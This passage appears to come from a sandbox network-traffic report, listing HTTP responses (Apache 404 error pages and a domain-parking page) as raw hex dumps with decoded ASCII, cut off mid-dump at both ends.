6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:32:46 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:32:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:32:51 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:32:54 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:25:39 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:25:41 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:25:44 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:25:47 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:25:52 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 63 34 34 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77
